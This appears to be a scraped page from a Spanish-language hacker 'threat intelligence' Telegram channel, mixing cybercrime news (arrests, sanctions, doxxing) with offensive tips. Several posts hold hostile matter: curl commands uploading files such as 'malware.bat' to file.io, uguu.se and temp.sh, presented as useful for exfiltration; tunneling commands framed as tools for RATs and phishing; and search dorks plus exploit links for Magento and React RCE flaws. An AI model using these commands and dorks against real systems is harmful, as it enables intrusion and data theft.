🎅FSEC INTEL ES 2.0 📡 🏴‍☠️🎄 – Telegram
🎅FSEC INTEL ES 2.0 📡 🏴‍☠️🎄
543 subscribers
270 photos
26 videos
13 files
178 links
Inteligencia de Amenazas de Hackers para Hackers. 📡

Estamos de vuelta!!

X : https://x.com/FsecIntelEs
Download Telegram
Tunneling usando Cloudflared - Exponiendo servidor local a la internet 🛠

Hoy vamos usar una herramienta la cual hoy en día esta siendo abusada por varios actores de amenaza para montar RATs y para Phishing. Cloudflared es una herramienta creada para desarrolladores fue creada por la emmpresa Cloudflare.

Descarga de Cloudflared he instalacion

wget https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64.deb && sudo dpkg -i cloudflared-linux-amd64.deb


Iniciando servidor local (Nginx)


sudo service nginx start 


Exponiendo nuestro servidor a la internet

 cloudflared tunnel --url http://localhost 


#tutoriales #manual #tunneling #hacking
13
Tunneling usando Serveo - Exponiendo servidor local a la internet 🛠

En esta ocasión vamos a usar otro servicio el cual es ampliamente usando para exponer servicio web de servidores victimas, no quiere instalación ni logeo lo que lo convierte en un servicio muy útil para actores de amenaza.

Estoy hablando de serveo.net en el cual solo se requiere ssh instalado, por ejemplo vamos a exponer nuestro servidor local.

Iniciar servidor
sudo service nginx start 


Exponiendo servidor
ssh -R 80:localhost:80 serveo.net


Nota: serveo.net no siempre se encuentra online

#manual #tunneling #hacking
8🤔1
Se revela la identidad de "Rey" administrador de Scattered LAPSUS$ Hunters y Hackers miembro de la pandilla de Ransomware Hellcat 🚨

• La identidad real de Rey es Saif Al-Din Khader, quien se cree que vive en Amán, Jordania.

• Antes de liderar SLSH, Rey supuestamente administraba un sitio web de filtraciones de un grupo de ransomware y gestionaba versiones de BreachForums, lo que demuestra sus profundos vínculos con la infraestructura clandestina del cibercrimen.

• La revelación de la identidad de Rey se debe a fallos en su OPSEC: los investigadores utilizaron datos de credenciales filtrados, registros de «infostealer» y una combinación única de correo electrónico y contraseña vinculada a su alias para confirmar el vínculo con su identidad real.

• Según el artículo, Rey afirma que está «intentando limpiar todo lo que me relaciona con ello y seguir adelante», y dice que lleva cooperando con las fuerzas del orden al menos desde junio de 2025.
😱6
Media Land LLC un Hosting a prueba de bala ruso fue sancionado por presuntamente apoyar operaciones de Ransomware y redes de Botnets. 🚨🇷🇺

Las autoridades lograron identificar a 3 personas claves dentro de la empresa rusa, Aleksandr Volosovik director general de Media Land, Kirill Zatolokin (Zatolokin) encargado de recibir los pagos y coordinar con actores de amenaza, Yulia Pankova (Pankova) está al tanto de la actividad ilícita de Volosovik, ha ayudado a Volosovik con cuestiones legales y ha manejado sus finanzas.

Como resultado de las sanciones los bienes dentro de los EEUU de Media Land serán confiscados.

https://home.treasury.gov/news/press-releases/sb0319

#rusia #busted
👍5🔥21
Forwarded from Freedom Fox 🏴‍☠
#Exploit для CVE-2025-54236 (SessionReaper) - Unauthenticated #RCE в Magento

https://github.com/rapid7/metasploit-framework/pull/20725

Netlas.io: tag.name:"magento" AND http.headers.server:"Apache"
FOFA: app="Magento"
HUNTER : product.name="Adobe Magento"
ZoomEye Dork: app="Magento"

Telegram  ✉️ @freedomfox
Please open Telegram to view this post
VIEW IN TELEGRAM
7
Servicio de Hosting File para subir ficheros desde la terminal util para exfiltracion ;) ⬆️🏴‍☠️

File.io
Limite de subida: 2GB
Tiempo de expiracion de fichero: 14 dias

https://file.io

Comando:
curl -F "file=@malware.bat" https://file.io



uguu.se
Limite de subida: 64MB
Tiempo de expiracion de fichero: 3 horas

https://uguu.se/

Comando:
curl -i -F files[]=@yourfile.jpeg https://uguu.se/upload



temp.sh
Limite de subida: 4GB
Tiempo de expiracion de fichero: 3 dias

https://temp.sh/

Comando:
curl -F "file=@test.txt" https://temp.sh/upload


#tools #resources #terminal #exfiltracion
9
🚨Exploit RCE en React (CVE-2025-55182)🏴‍☠️

Esta vulnerabilidad afecta a React Server Components (RSC) y los marcos que los implementan, particularmente Next.js. La vulnerabilidad, denominada “React2Shell” por los investigadores, permite la ejecución remota de código no autenticado a través de una única consulta HTTP.

🔍 DORKS

FOFA
app="NEXT.JS" || app="React.js"


ZOOMEYE
http.body="react.production.min.js"  http.body="React.createElement("  app="React Router"  app="React.js"  app="next.js"


💣 EXPLOIT/Scanner
https://github.com/sumanrox/rschunter

#dorks #exploit #rce #github
5
Autoridades americanas extraditan a "Hacker" Ucraniana 🇺🇦🇷🇺

Segun el departamento de justicia de EEUU la ciudadana ucraniana Victoria Eduardovna Dubranova, de 33 años es acusada de coordianar y realizar ataques informaticos hacia infraestructura critica dentro de los EEUU y a paises de la OTAN.

Segun documentos de acusacion Dubranova formaba parte de grupos Hacktivista Pro-Rusos como CyberArmyofRussia_Reborn, Z-Pentest y Noname bajo el alias de "Vika" segun ayudo a realizar ataques a sistemas SCADA y realizar ataques de DDOS a varios servidores considerados enemigos de Rusia.

Dubranova fue extraditada a Estados Unidos a principios de este año acusada de apoyar a CyberArmyofRussia_Reborn y se espera que responda por multiples ataques informaticos.

https://www.courthousenews.com/wp-content/uploads/2025/12/united-states-vs-dubranova-indictment-one.pdf

https://www.justice.gov/opa/pr/justice-department-announces-actions-combat-two-russian-state-sponsored-cyber-criminal

#rusia #ucrania #busted #hackers
💅12🤔32